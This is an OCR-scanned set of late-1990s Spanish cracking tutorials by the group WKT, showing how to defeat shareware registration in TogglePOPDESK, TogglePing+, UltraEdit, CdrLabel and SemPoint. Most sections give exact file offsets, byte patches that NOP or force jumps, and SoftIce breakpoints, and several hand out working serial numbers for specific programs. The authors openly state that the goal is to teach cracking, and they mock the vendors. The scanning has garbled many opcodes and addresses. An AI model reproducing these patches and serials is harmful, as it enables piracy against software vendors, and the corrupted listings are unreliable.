Ummmnm, sabroso serial!! :0) 


Podriamos cargar el Softlce (Depurador) y poner alguno de los breakpoints típicos como "BPX HMEMCPY", 
"BPX GETDLGITEMTEXTA" , "GETWINDOWTEXTA" ....... etc Y esperar a que caiga el Oso en el cepo. Pero 
como no me apetece nada reiniciar el pc para cargar el Softlce vamos a tirar de Wdasm 8.93 (Desensamblador) 


Abrimos el Wdasm y cargamos el archivo TogglePOPDESK.exe Bien, bien......¿ y ahora qué? Pues ahora una 
opción típica es buscar el mensaje de error que nos aparece al introducir un número de serie incorrecto. Total, que 
volvemos al PopDesk y metemos un numero a boleo. Paff!! ventanuco que nos dice: "The registration information 
you have entered is not valid......etc". Vamos a buscar ese texto con el wdasm. Pulsamos el botón de String 
References y en esa lista deberia estar. Nos aparece hacia el final. Pulsamos doble click sobre ella y vemos que nos 
lleva a: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00404964 (C) 


:0040497D 6A10 push 00000010 


* Possible StringData Ref from Data Obj ->"The registration information you " 
->"have entered is not valid." 


:0040497F 68CC844200 push 004284CC 
:00404984 EBO9 jmp 0040498F 


Estupendo, estamos sobre la pista. Lo que necesitamos es evitar que el 
programa llegue a este mensaje. Así que subimos un poco y miramos desde donde 
se llega aquí. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00404964 (C) 


:0040495A E831FAFFFF call 00404390 


:0040495F 83F801 cmp eax, 00000001 
:00404962 6A00 push 00000000 
:00404964 “7517 jne 0040497D 
:00404966 6A%J0 push 00000040 


* Possible StringData Ref from Data Obj ->"Registration is Complete!" 


:00404968 6850854200 push 0042855€C 
:0040496D E86B6A0100 call 0041B3DD 
:00404972 6A00 push 00000000 
:00404974 8BCE mov ecx, esi 
:00404976 E8C9F90000 call 00414344 
:0040497B EB17 jmp 00404994 


Como podemos observar, al mensaje de error se llega desde un salto 
condicional en: 
:00404964 7517 3jne 0040497D 


Vaya vaya. Sera este? no se, vamos a cambiarlo para que Nunca Salte. 
Nos situamos en la linea 
:00404964 7517 3jne 0040497D 


Y apuntamos el OFFSET. Abrimos el archivo con el Ultraedit y pulsamos la 
tecla GOTO (ir a) y escribimos lo siguiente: "0x4964" con lo que aterrizamos 
de lleno en un 7517, que como ya te habras dado cuenta en el Wdasm, es el 
código de la instrucción jne (75) + El desplazamiento (17). Este 
desplazamiento es el número de bytes que debe saltar el programa para llegar 
a la siguiente instrucción.Contados siempre en hexadecimal, por supuesto. 


Cambiamos 7517 jne por 9090 NOP NOP 
NOP es una instrucción cuya increible utilidad es NO HACER NADA. 
Vamos a probar el programa, a ver si casca O que pasa. ummmmm, Ccarga...... 


vamos a meterle un número de serie a boleo...... por ejemplo "65465487" 
mismamente :0) . Anda!! si esta registrado!!! joer ke facilón ¿no?. No me lo 
creo. Cerramos y volvemos a cargarlo a Ver........ coño!, ¿que pasa? Pero si 


no esta registrado!! 

¿Que ha pasado? Este es un error típico cuando se esta empezando en la 
Ingenieria Inversa. Lo que ha sucedido es que simplemente forzamos al 
programa a enseñarnos siempre la ventana de "Registration is Complete". Pero 
el programa realmente no esta registrado. 

¿Por que?. Ahora lo veremos. ¡0) 


Volvemos al "death listing" o listado muerto. 


:0040495A E831FAFFFF call 00404390 
:0040495F 83F801 cmp eax, 00000001 


:00404962 6A00 push 00000000 
:00404964 “7517 jne 0040497D 
:00404966 6A%J0 push 00000040 


* Possible StringData Ref from Data Obj ->"Registration is Complete!" 


Si te fijas bien, justo encima del salto condicional hay una comparación, que 
es precisamente la que condiciona el salto. Umm, compara el registro eax con 
el valor 1. Si no es 1 el programa saltara a la ventanita de error. Hemos 
forzado el salto para que nunca se produzca. Donde esta el fallo? En esa 
comparación. Sabemos que al regresar de la llamada a :00404390 el valor 
contenido en eax debe ser 1 para que nos aparezca la ventana de "Registration 
is Complete". Asi que debemos entrar en esa llamada y asegurarnos de que 
devuelva siempre un 1 en eax. ¿Por que? pues porque ese trozo de código (El 
que comienza en :00404390) puede ser llamado desde otras partes del programa. 
Ahi es donde nos comprueba si estamos o no estamos registrados correctamente. 


* Referenced by a CALL at Address: 


| :0040495A 

| 

:00404390 6AFF push FEFFFFFEF 

:00404392 68B0EE4100 push 0041EEBO 

:00404397 64A100000000 mov eax, dword ptr fs: [00000000] 
:0040439D 50 push eax 

:0040439E 64892500000000 mov dword ptr fs:[00000000], esp 
:004043A5 51 push ecx 

:004043A6 55 push ebp 

:004043A7 56 push esi 

:004043A8 57 push edi 


Vemos que este trozo de código solamente es llamado desde :0040495A. Asi que 
en esta ocasión no tendremos que asegurarnos de que el código llegue a una 
parte donde ponga un 1 en eax ni tampoco forzarlo nosotros. Nos basta con 
evitar el salto condicional que modificamos antes para asegurarnos de que no 
nos lleva a la ventana de error. Seguimos. 

A primera vista no vemos nada que nos pueda ser útil. Asi que bajamos un poco 
hacia abajo a ver que hay. Llegamos a: 


:0040445E 3BC6 cmp eax, esi 

:00404460 0F85CB000000 jne 00404531 

:00404466 E854890100 call 0041CDBF 

:0040446B 8B4004 mov eax, dword ptr [eax+04] 


:0040446ÉE 56 push esi 


* Possible StringData Ref from Data Obj ->"RegNumber" 


:0040446F 681C834200 push 0042831C 


Ummm, ¿que es esto? Una bonita referencia al número de registro. Y Justo 
encima un salto condicional que la evita. 


:00404460 0F85CB000000 jne 00404531 


¿Qué tal si evitamos ese salto? Procedemos como en el caso anterior. Nopeamos 
"0F85CB000000" y nos queda "909090909090". 

Vamos a probar el programa, a ver si casca O que pasa. ummmmm, Carga...... 
vamos a meterle un número de serie a boleo...... por ejemplo "65465487" 
mismamente :0). Hey!! esta vez si que estamos registrados. :0) 


Genial, ahora vamos a ver donde guarda la información de registro. Porque el 
numero de serie seguramente lo guarde en alguna parte. Con lo breve que fue 
esto tiene toda la pinta de meterlo en el registro del windows. 
Efectivamente, Nuestro serial es almacenado en: 


[HKEY_CURRENT_USERISoftwarelToggle SoftwarelTogglePOPDESKMRegistration] 
"LastTipTime"=dword:37d48d7a 

"RegNumber"=dword:00c55800 

"Name"="MR.WHITE [WKT!]" 

"Company"="[WKT!]" 


UMmM..... ESE NO ES EL NUMERO QUE NOSOTROS METIMOS!!!! 

(Entre Paréntesis tienes el número en formato decimal) 

Yo tengo el serial: 32865017 

Que raro , que raro..... será el serial correcto? Será tan mala esta 
protección que hasta te regala el serial correcto??? JO-DER!! 

Vamos a probar...... Borramos la clave Registration del registro y volvemos a 
cargar el programa. Estaba claro, ahora sigue unregistered. Renombramos el 
TogglePOPDESK.exe a TogglePOPDESK.crk y el TogglePOPDESK.bak que nos creo el 
Ultraedit a TogglePOPDESK.exe. Metemos el serial 32865017 y..... Voilá! Es el 
serial correcto!! :0) (deskojone total) 


La protección de este programa es mínima, pero se aprecia una pequeña mejora 
respecto a otros programas de www.toggle.com. Quizá en próximos tutoriales 
veremos si el programador es consciente de su "ignorancia". 


Creo que no hace falta que te recuerde el propósito de estos tutoriales. ¿no? 


NOTA: Estos tutoriales pueden contener errores intencionados (puede ser que 
el autor se haya saltado la explicación de algún paso, errores en las 
direcciones de memorla...... etc). 


El objetivo es que aprendas a crackear y que tengas ideas propias. ¡o) 


X++ *=*=*=* PERSONAL GREBETZ **-*-*-=== ++* 
Dasavant, Niabi, r00ster, ZEncrakz, Azrael, Klimpong, Zor 
Conde-Vampiro, Mac-Crack, Killer_P, ASTAGA, Harvestr, lIczelion 
JosephCo, Carpathia, Taylor, Tapu, Ivanopulo, EgoistE, Tornftdo, 
JUANDA, Leoworld, ReKiem, Neural_N, Netking, Russ97, 
Mr.Pink and of course all WKT Members ¡;o) 


* * 


|WHISKEY KON TEKILA| 
[Mr .whiTe [WkT!99] | 
|http://wkt.tsx.orgl 
|http://ecd.tsx.org| 


* * 
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Programa TogglePing+ v1.1A WO95 /W98 / NT 
| Descripción [Utilidad para comprobar la velocidad de tu conexión. 
O 

Url PA 
in Sea e 
| Dificultad [1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista. 
| Herramientas [W32dasm v8.93, UltraBdit 6. La 
Objetivo [Simular estar registrados y obtención de un número de Serie Válido. 
Fea e Sere de 1 


Introducción 


El Programa hace ping a la web que le indiques y posteriormente se la baja. 

Te presenta el resultado en una bonita gráfica. Al menos eso me pareció ver en la ayuda. 
Vale, lo reconozco. Soy un viciosillo!! 

Solo me limite a analizar su protección y a desinstalarlo ;0) 

Utilidad? A no ser que trabajes en una revista y tengas que hacer la típica comparativa de 


proveedores..... yo no le veo ninguna. 
> 
Ll 


Desde luego que si el Genial Estado+Porcino se hubiese topado con este programa 
estaría muerto de risa una semana. Y desde luego que no es para menos. :0) 

¿Tan fácil? SI!, esta es una victima perfecta para los mas newbies en la Ingenieria 
Inversa. 

¿Tu primer crack? bien podría serlo. 


Que miedo! 


Al Atake 


Al abrir el programa vemos una bonita nag con 3 botones: 


1. Buy Now 
2. Try It First 
3. Quit 


Y le damos al Quit ¿no? venga ya! :0) . Tenemos dos opciones, pulsar try it first, con lo cual se abre el programa en si y 
despues de ir al tipico help/about vemos ke NO HAY Opcion de registro. Juajua, fale, pues entonces buy now. Oh! una 
ventana soltandonos el rollo típico: 


Asi que te has decidido a comprar el Ping+ ¿ein? blablabla, PREPARA TU VISA o MASTERCARD!!! (ya les gustaria 
ya.... esta MIERDA yo no la pago. Por principios!), introduce tu CODIGO aqui. 


Ummmm, sabroso serial!! :0) 


Podriamos cargar el Softlce (Depurador) y poner alguno de los breakpoints típicos como "BPX HMEMCPY", "BPX 
GETDLGITEMTEXTA" , "GETWINDOWTEXTA" ....... etc Y esperar a que caiga el Oso en el cepo. Pero como no me 
apetece nada reiniciar el pc para cargar el Softlce vamos a tirar de Wdasm 8.93 (Desensamblador) 


Abrimos el Wdasm y cargamos el archivo Pingplus.exe. Bien, bien......¿y ahora qué? Pues ahora una opción típica es 
buscar el mensaje de error que nos aparece al introducir un número de serie incorrecto. Total, que volvemos al Ping+ y 
metemos un numero a boleo. Paff!! ventanuco que nos dice: "The specified registration number is not valid......etc". 
Vamos a buscar ese texto con el wdasm. Pulsamos el botón de String References y en esa lista deberia estar. Deberia?? 
Mierda! no está!! 

Abandonas? juajua, que miedica! Pensemos.....ummmm, no esta en Pingplus.exe. Pero en alguna parte tiene que 
estar!!! es hora de abrir la carpeta donde hemos instalado el Ping+ y echar un vistazo. 

Umm, una dll con un nombre muy sugerente: TogReg.dll 

Apuesto a que esto nos va a servir para algo. :0) 

La abrimos con el Wdasm y buscamos en las String References..... Voilá! Aquí esta la cadena que buscamos. Pulsamos 
doble click sobre ella y vemos que nos lleva a: 


* Possible StringData Ref from Data Ob] ->"Registration" 


:100012D0 68B0610010 push 100061B0 


* Possible StringData Ref from Data Obj ->"The specified registration number " 
=>"is not valid. Please enter the " 
-=>"registration information exactly " 
=>"as it is shown on your registration " 
-=>"instructions." 


:100012D5 681C610010 push 1000611C 
:100012DA 53 push ebx 


Estupendo, estamos sobre la pista. Lo que necesitamos es evitar que el programa 
llegue a este mensaje. Así que subimos un poco y miramos desde donde se llega 
aquí. 


* Reference To: USER32.GetWindowTextA, Ord:013Fh 


:100012B3 FF1568920010 Call dword ptr [10009268] 

:100012B9 8D85FCFEFFEFF lea eax, dword ptr [ebp+FEFFFFEFC] 
:100012BF 50 push eax 

:100012C0 E87B050000 cal1 10001840 

:100012C5 3B052C8C0010 cmp eax, dword ptr [10008C2C] 

:100012CB 59 pop ecx 

:100012CC 7415 je 100012E3 

:100012CE 6A40 push 00000040 

Anda mira!, una llamada a la función GetWindowTextA!! (Si hubiesemos atacado 


desde el SoftlIce esta sería la función a usar). Y mas abajo un salto condicional 
que evita llegar a la parte de código que no nos interesa. Vaya vaya. Sera este? 
no se, Vamos a cambiarlo para que Salte Siempre. Nos situamos en la linea 
:100012CcC 7415 je 100012E3 


Y apuntamos el OFFSET. Si no sabes lo que es un Offset que haces leyendo esto? 
Busca un tutorial de ASM. :0) ahhh, que es la primera vez que usas un 
desensamblador y no sabes donde esta el OFFSET!!! Haberlo dicho antes!!! :0) 


Ly 
Line:581 Pg 8 of 132 Code Data (2:100012CC Ex0ffset ODOMOECCh puFile:TogReg.dil 


Lo tienes ¿no? Ahora abrimos el Ultraedit (Es un Editor Hexadecimal, cualquier otro sirve) y cargamos el archivo 
TogReg.dll. Pulsamos la tecla GOTO (ir a) y escribimos lo siguiente: "Ox6cc" con lo que aterrizamos de lleno en un 
7415, que como ya te habras dado cuenta en el Wdasm, es el código de la instrucción je (74) + El desplazamiento (15). 
Este desplazamiento es el número de bytes que debe saltar el programa para llegar a la siguiente instrucción. Más 
concretamente los bytes que debe sumar la ALU al registro IP para saber que instrucción debe ejecutarse. 


Cambiamos 7415 je por EB15 para forzar a que Salte Siempre. 


Si el ultraedit no te dejase escribir ni un solo byte (no es el caso, obviamente, pero lo comento porque ya me lo han 
preguntado por e-mail dos veces jeje) deberias quitarle la opción de solo lectura al archivo. :0) 

Si lo que te pasa es que no te deja grabar el archivo que has modificado....... CIERRA EL WDASM y CIERRA EL 
PROGRAMA VICTIMA, melón!!! :0) 


Hey! que no hemos acabado!! (¿o si?). Vamos a probar el programa, a ver si casca o que pasa. ummmmm, carga...... 
vamos a meterle un número de serie a boleo...... por ejemplo "65465487" mismamente :0) . Anda!! si esta registrado!!! 
joer ke facilón ¿no?. No me lo creo. Cerramos y volvemos a cargarlo a ver........ juajua. Funciona. Esta registrado!! 
¿Que cachondeo es este? ¿Ya está? pfff. Genial, ahora vamos a ver donde guarda la información de registro. Porque el 
numero de serie seguramente lo guarde en alguna parte. Con lo breve que fue esto tiene toda la pinta de meterlo en el 
registro del windows. Efectivamente, Nuestro serial es almacenado en: 


[HKEY_CURRENT_USERASoftwarelToggle SoftwarelPingPluslRegistration] 
"InstallTime"=dword:37d48e24 
"RegNumber"=dword: 21d24e48 


UnmM..... ESE NO ES EL NUMERO QUE NOSOTROS METIMOS!!!! 
(Entre Paréntesis tienes el número en formato decimal) 


Yo tengo el serial: 567430728 


Que raro , que raro..... será el serial correcto? Será tan mala esta protección 
que hasta te regala el serial correcto??? JO-DER!! 
Vamos a probar...... Borramos la clave MRegistration del registro y volvemos a 


cargar el programa. Estaba claro, ahora sigue unregistered. Renombramos el 
TogReg.dl1 a TogReg.crk y el TogReg.bak que nos creo el Ultraedit a TogReg.dll. 
Metemos el serial 567430728 y..... Voilá! Es el serial correcto!! :0) (deskojone 
total) 

Una cosa es segura: la InstallTime no tiene nada que ver en la obtencion del 
Serial, y apostaria a que es un serial único. Esto ya es mera suposicion visto 
lo visto.... pero nunca se sabe jejeje. 


Bien, como has visto esto no es protección ni es nada. Para proteger asi un 
programa, por muy cutre que sea es mejor hacerlo freeware, nos ahorraria 
aproximadamente..... ¿cuanto? 10-15 minutos entre que lo bajamos, lo instalamos 
y Cambiamos un byte? 


Joer, y despues se quejan de que las perdidas económicas por culpa de la 
Piratería son Inmensas. Y digo yo: como coño esperan que alguien pague por esta 


MIERDA de programa? Seamos serios señores, no se puede pretender VENDER un 
programa cuando no se tiene ni puta idea. 


Además, que reto es este para un cracker? Por una parte me da asco hasta sacar 
el crack. Pero solo por lo MIERDAAAAA de protección que tiene me da un 
gustiMos ss Para que espabile el programador y la proxima vez se coma mas el 
tarro. 


Si quieres estudiar la protección de otro programa de www.toggle.com , un pelin 
más avanzada puedes leer mi Tutorial sobre el TogglePopDesk v1.1A 


Creo que no hace falta que te recuerde el propósito de estos tutoriales. ¿no? 


NOTA: Estos tutoriales pueden contener errores intencionados (puede ser que el 
autor se haya saltado la explicación de algún paso, errores en las direcciones 
de memoria...... etc). 

El objetivo es que aprendas a crackear y que tengas ideas propias. ;0) 


kdb *=*=*=* PERSONA ML GREETZ **-*-* ERA 
Dasavant, Niabi, r00ster, ZEncrakz, Azrael, Klimpong, Zor 
Conde-Vampiro, Mac-Crack, Killer_P, ASTAGA, Harvestr, Iczelion 
JosephCo, Carpathia, Taylor, Tapu, Ivanopulo, EgoistE, Torntdo, 
JUANDA, Leoworld, ReKiem, Neural_N, Netking, Russ97, 
Mr.Pink and of course all WKT Members ¡;o) 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


Programa Ultraedit v6.10a | W95 / W98 / NT 


Descripción Excelente editor Hexadecimal. 
Tipo Shareware (30 $) 


Url http://www.ultraedit.com 


Protección Nag Screen que nos pide el Numero de Serie. Time Limit 45 Dias 


Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 


Herramientas Softlce v3.24, W32dasm v8.9, UltraEdit v5.0a 
Objetivo Simular estar registrados. 


Cracker Mr.WhiTe [WkT!] 
Fecha 15 de Julio de 1999 


Introducción 


El programa no tiene limitaciones por no estar registrado, pero aparece una nag- 
screen cada vez que se arranca el programa. Hay una opción para registrarse, 
introduciendo el nombre y la clave. El objetivo será simular que nuestro fake serial 
es un número de serie correcto. 


Al Atake 


Lo primero es ver cómo reacciona el programa al intentar registrarnos. 

Ponemos un nombre, y clave cualquiera, y nos aparece un mensaje que nos dice algo asi "UltraEdit will need to 
be restarted in order to validate the code". 

Total, que salimos del UltraEdit y volvemos a entrar para que nos compruebe el serial. 


Si te fijas, al cerrar el programa, en el directorio donde lo has instalado, se crea un archivo de registro 
uedit32.reg. Este archivo esta encriptado, y contiene precisamente nuestros datos de registro. Si utilizas el 
FileMonitor, podras comprobar como el UltraEdit lee este archivo para comprobar si nos hemos registrado 
correctamente. 


Bien, vamos a utilizar nuestro queridisimo "death listing” o listado muerto y bucear en el código. :0) 


Una vez desensamblado con el W32dasm, guardamos el project file para no tener que desensamblarlo mas 
tarde. Pulsamos el boton de String Data References y empezamos a buscar alguna pista. 
Vemos varias referencias interesantes: 


e Thank you for supporting Shareware 
e UltraEdit 45 Day UltraEdit 45 Day Evaluation time expired!!!! 


Despues de un buen rato investigando el código, y cuando ya empezaba a perderme con tantas posibles 
referencias....... se me ocurrio "cazar" al programa cuando lee ese archivo de registro uedit32.reg. 


Buscando en mi HD encontre esas excelentes paginas de TornOdo, las Cracker's Notes. 


Cojonudo, ahora solo tengo que encontrar la funcion adecuada. Vamos al apartado files a ver que hay....... 
ummm " GetPrivateProfileStringA " coooño, esta me suena. Á ver para que carajo sirve...... 

"Retrieves a string from the specified section in an initialization file" ;0) Comprobamos en el W32Dasm que 
funciones importa el UltraEdit ..... BINGO, está. ¿probamos? PROBAMOS. 


Vamos al Softlce y abrimos el UltraEdit. ARgg, la dichosa Nag que nos pide el serial. Ponemos un nombre y 
un serial cualquiera ( de 6 caracteres ) y.... quietooooo!!!! antes de pulsar el boton , Control+D y vamos al 
Softlce, ponemos un BreakPoint en la funcion " GetPrivateProfileStringA ", (BPX GetPrivateProfileStringA), 
Control+D again. Pulsamos el boton, BANG! PANTALLAZO y de vuelta al Softlce. :0) 


:0040D209 E832A00500 cal1 00467240 ¡Aquí aterriza el Softice 
:0040D20E 59 pop ecx 

:0040D20F 59 pop ecx 

:0040D210 5E pop esi 

:0040D211 85C0 test eax, eax 

:0040D213 7520 jne 0040D235 ¡¿Saltamos a.... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040D213(C) 


:0040D235 8D45C0 lea eax, dword ptr [ebp-40] ¡Serial Real 
:0040D238 50 push eax 

:0040D239 8D4580 lea eax, dword ptr [ebp-80] ¡Nuestro Fake Serial 
:0040D23C 50 push eax 

:0040D23D E8FE9F0500 call 00467240 ¡Compara los Serials 

:0040D242 59 pop ecx 

:0040D243 85C0 test eax, eax 

:0040D245 59 pop ecx 


:0040D246 7426 je 0040D26E ¿HAS PAGADO!!! 

:0040D248 8D8540FFFFEF lea eax, dword ptr [ebp+FFFFFF40] ¿Otro Serial valido 
:0040D24E 50 push eax 

:0040D24F 8D4580 lea eax, dword ptr [ebp-80] ¡Nuestro Fake Serial 
:0040D252 50 push eax 

:0040D253 E8E89F0500 call 00467240 ¡Compara los Serials 

:0040D258 59 pop ecx 

:0040D259 85C0 test eax, eax 

:0040D25B 59 pop ecx 

:0040D25C 7410 je 0040D26E ¿HAS PAGADO!!! 

:0040D25E C70500F24C0001000000 mov dword ptr [004CF200], 00000001 

Es curioso, hay dos numeros de serie validos !!!!, en fin.... No comments ;o) 


:0040D235 8D45C0 lea eax, dword ptr [ebp-40] 

Si aqui escribimos " db ebp-40 " en el softlce veremos el primer serial válido. 
:0040D248 8D8540FFFFFF lea eax, dword ptr [ebp+FFEFFFF40] 

Si aqui escribimos " db ebp+FFFFFF40 " en el softlce veremos el segundo serial válido. 


Vamos a Parchear esto para que nos acepte cualquier serial: 
:0040D246 7426 je 0040D26E 


Lo cambiamos por " :0040D246 EB26 JMP 0040D26E " 
Así siempre saltara al código correcto y se creera que el serial que le hemos puesto lo hemos pagado. ;o) 


Ok, estupendo. Parece que ya esta listo, asi que probamos de nuevo nuestro fake serial y ...... tachan ..... tachan.... nos crea el 
uedit32.reg (tal y como esperabamos), cargamos el UltraEdit otra vez... AAAAAAARGGGG !!!! PERO QUE PASAAAA?? (nos 
ha borrado el uedit32.reg) sera cabronazooo0000!!!. NAAAAG NAAAAG again !! 

Flipante !! :0? ya nos ibamos y resulta que el programilla se las da de listo. Vaya vaya..... Esto no puede ser. :o( 


Ummmm, nos borra un archivo!!. ¿y? ¿donde esta el problema? 
Recurrimos otra vez a las funciones importadas por el UltraEdit ( buscalas en el listado muerto con el W32Dasm ). Ummmm, una 
funcion que nos borre un archivo..... joer, hay varias que ponen Delete: 


RegDeleteKeyA 

DeleteFileA <--- ¡Uy, QUE SUPERSORPRESAAAA !!! 
DeleteDC 

DeleteObject 


:0) Back to Softlce !!!. Repetimos el fake serial, cerramos el UltraEdit y vemos como nos crea el archivo 
uedit32.reg. Ahora ponemos el BreakPoint: " BPX DeleteFileA " cargamos el UltraEdit y PLAF, pantallazo y 
de vuelta al Softlce. 


Aterrizamos en: 


* Reference To: KERNEL32.DeleteFileA, Ord:0057h 


:004443BA FF1514644A00 Call dword ptr [004A6414] 
:004443C0 A174024D00 mov eax, dword ptr [004D0274] 
:004443C5 8065FC00 and byte ptr [ebp-04], 00 
:004443C9 83C0D4 add eax, FFFFFFD4 

:004443CC 8D4DEC lea ecx, dword ptr [ebp-14] 
:004443CF A37C024D00 mov dword ptr [004D027C], eax 
:004443D4 899E32070000 mov dword ptr [esi+00000732], ebx 


:004443DA E8CE950300 call 0047D9AD 


Ummm, ¿que tal si machacamos esa asquerosa llamadita a DeleteFileA? 
:004443BA FF1514644A00 Call dword ptr [00446414] 


La sustituimos por: :004443BA 909090909090 (6 NOPS ) 


Comprobamos si nos mantiene el archivo ....... SÍ funciona. Quiza te haya sorprendido la manera de enfocar este tutorial puesto 
que no es la mejor opcion para registrar este programa, la mas limpia quiero decir. Pero asi aprendes las guarreridas que se 
pueden hacer. Ademas, funciona ¿no? El Programa cree que nuestro numero de serie es correcto, con lo cual ya no nos aparece la 
molesta nag al principio. 

En la ventana de Help/About aparecemos como registrados, el programa no caduca y como ya no nos borra el archivo uedit32.reg 
Pe ya tenemos otra excelente herramienta ;0) 


Creo que no hace falta que te recuerde el propósito de estos tutoriales. ¿no? 


NOTA: Estos tutoriales pueden contener errores intencionados (puede ser que el autor se haya saltado la explicación de algún 
paso, errores en las direcciones de memoria......etc). 
El objetivo es que aprendas a crackear y que tengas ideas propias. ;0) 


ii======== A PERSONAL GREETZ *+-*-ko======= per 
Dasavant, Niabi, r00ster, ZEncrakz, Azrael, Klimpong, Zor 
Conde-Vampiro, Mac-Crack, Killer_P, ASTAGA, Harvestr, Iczelion 
JosephCo, Carpathia, Taylor, Tapu, Ivanopulo, EgoistE, Tornftdo, 
JUANDA, Leoworld, ReKiem, Neural_N, Netking, Russ97, 
Mr.Pink and of course all WKT Members ¡;o) 
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Win 


Introducción 


ShareWare de 30 días, con opción para registrarse introduciendo las 2 claves 
pertinentes. 

La versión no registrada tiene alguna limitación, como no poder configurar alguna 
opción, y no imprimir adecuadamente. 


VM 


Al Atake 


Lo primero es ver cómo reacciona el programa al intentar registrarnos. 

Empieza bién(para el programador, mal para el cracker ;-), ya que después de 
introducir los valores del registro, no sale ninguna pantalla indicando si está bién o 
mal, que es uno de los puntos de ataque más frequentes. 

A primera vista pues, parece que hay un cierto esmero en la protección. 


Lamentablemente (no para el cracking, ;-DD), esa impresión desaparece 
inmediatamente al probar una de las opciones capadas (Spine...Customize 
Initials..), ya que sale el típico mensajito de "Only registered users". 


Con una cierta sonrisa, arrancamos el Pc con el Softlce, ejecutamos el CdrLabel, y 
vamos al Softlce (Ctrl+D) para poner un breakpoint. 

El mensajito tiene toda la pinta de ser un MessageBox, así que ponemos el 
BreakPoint para ello (BPX MessageBoxA). 

Volvemos al programa(Ctrl+-D), y vamos a la opción que no está permitida. 


Jeje, el BreakPoint hace efecto, y ya estamos en el Softlce. 

Veamos de dónde viene la llamada a MessageBox, con el mágico P RET(F12). 
Ok, se ve el call, y unas líneas antes, una llamada a un rutina (call 41E8A0), y una 
comprobación a continuación. 


Como esa rutina hace pinta de ser interesante, le ponemos un 
BreakPoint(DobleClick sobre el call), y desactivamos el punto de ruptura anterior 
(BD 0) 

Volvemos al programa(F5), y reintentamos la misma opción. 


Ok, ya estamos de vuelta al Softlce, justo en el momento del call 41E8A0 

Con ES entramos en la rutina, y por suerte es muy cortita, y se ve bastante clara. ;-) 
Lo que hace la rutina es verificar si somos usuarios registrados, y devuelve AX=0 
si no los somos, y AX=1 en caso contrario. 


El call a kapar es :41E903 jz 41E90EF, así que lo substituiremos por Nop,Nop 
(Para hacerlo, A 41E903, introducir 2 veces nop, y enter para acabar.) 
Desactivamos los breakpoints (BD *), y seguimos con el programa(E5). 


Bingo, ya no aparece lo de "only registered users", sino la pantalla adecuada. ;-) 
Y además, podría ser que esa misma rutina se llamara para otras 
comprobaciones... 

Jeje, pues sí. ;-) S1 nos vamos al menú de About, nos dice Thanks for registering, 
en lugar del aviso de shareware. ;-) 


Ahora queda buscar los 2 bytes a modificar en el fichero exe, para dejar efectivo el 
parche. 


De todas maneras, después de todo, el n* de registro válido para la versión 3.0, que 
WKT ya crackeó en su día, sigue funcionando también para la 4.1 ;-) 


Cdrlabel 3.0 Serial by WKT (WHISKEY KON TEKILA) 


http://wkt.tsx.org 


Registration Line 1:111111111 
Registration Line 2:47872 


* 
Vi 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 
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| DESCripCión — |Lector para BBS y FidoNet 
O 
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FEChA 13 de Agosto de 1998 


é Crack con dedicatoria especial para Ollapi. ;-) 
Combataró EMSDA - El Movimiento Se Demuestra Andando. 


VM 


Introducción 


Las limitaciones de la versión no registrada son : 

Al iniciarse el programa, se muestra la típica (y molesta) ventana de shareware, 
que no puede cerrarse hasta pasados 3 segundos. 

Además hay una opción (TearLine) que no aparece si no estas registrado. 


Para registrarse, hay que introducir el nombre, un n? de serie, y un código de 
registro. 


Al Atake 


Las primeras pruebas que hice fueron en torno al BPX GetWindowText para la 
pantalla de Registro, e intentar seguir qué hacía con los valores introducidos. 
Como la cosa se liaba demasiado, cambio de táctica... 


Con el FileMon y el RegMon activados y filtrando para Sem*, volví a ejecutar el 
Sempoint, para ver a qué ficheros y valores del registro de windows accedía. 

Del registro nada, pero de los ficheros había uno que intentaba abrir y no 
encontraba, y con nombre sospechoso (Scripta.Reg). 


Así que de vuelta al Softlce, previa consulta de cual es la llamada de la 
interrupción 21 a Abrir Fichero. 
Para interceptarla : BPINT 21 IF AH==3D 


Arranco el Sempoint, y el BreakPoint hace efecto, apareciendo en el Softlce, en el 
momento de abrir un fichero. Con D DS:DX ,se puede ver el nombre del fichero 
que se va a abrir. 

El que interesa es el fichero Scripta.Reg, al cual se accede después de 4 veces ES, 
con el breakpoint activado. 


Ok, ahora con 3 veces F12 nos situamos en la posición CS:02DB or al,al 

La línea siguiente (CS:02DD) es un salto condicional (JZ 0330) 

Si lo capamos (Nop,Nop), el Sempoint se pensará que estamos registrados, activará 
el menú de TearLine, desactivará el menú de Registro, y empezará el programa 
inmediatamente sin mostrar ninguna pantallita de shareware. ;-) 


Él programa ya está crackeado, aunque si vamos al menú de About, aún nos dice 
que unregistered user. No tiene importancia, pero si se prefiere que no lo ponga, se 
puede cambiar : 

Ejecutar el Sempoint, y después de abierto, poner (o reactivar) el breakpoint para la 
apertura de fichero (BPINT 21 IF AH==3D), e ir al menú de About. 


Otra vez hace efecto el breakpoint. Con D DS:DX ,comprobamos que 
efectivamente se intenta abrir el fichero Scripta.Reg 

Ok, ahora con 3 veces F12 nos situamos en la posición CS:007E or al,al 

La línea siguiente (CS:0080) es un salto condicional (IZ 0OF6) 

Si también lo capamos (Nop,Nop), ya no nos saldrá lo de unregistered user. ;-) 


Como parece que con los 4 Nops ya hay bastante, se trata ahora de localizar esos 
bytes en el fichero SemPoint.Exe. 

Hay que ir con cuidado qué bytes se buscan, ya que los que tienen que ver con el 
segmento son variables, y no se encontraran igual en el exe. 

Por ejemplo, la llamada anterior a CS:02B en mi caso era call 304f:06ab (YA AB 
06 4F 30) 

Pues bién, si se buscan esos bytes en el exe no se encontrarán. 

Habría que buscar (9A AB 06), o sea sin tener en cuenta la parte del segmento. 


De todas maneras, en este programa ha sido fácil localizar los bytes, simplemente 
haciendo una búsqueda de : 


08 C0 74 51 (or al,al ; jz 0330 ; para el primer parche) 
08 CO 74 74 (or al,al ; jz OOf6 ; para el segundo parche) 
Como sólo había una ocurrencia para cada uno, no había duda... ;-) 


Para aplicar el parche en el fichero exe definitivamente, con un editor hexadecimal 
cambiar : 

en el offset 42DD en lugar de 74 51 poner 90 90 

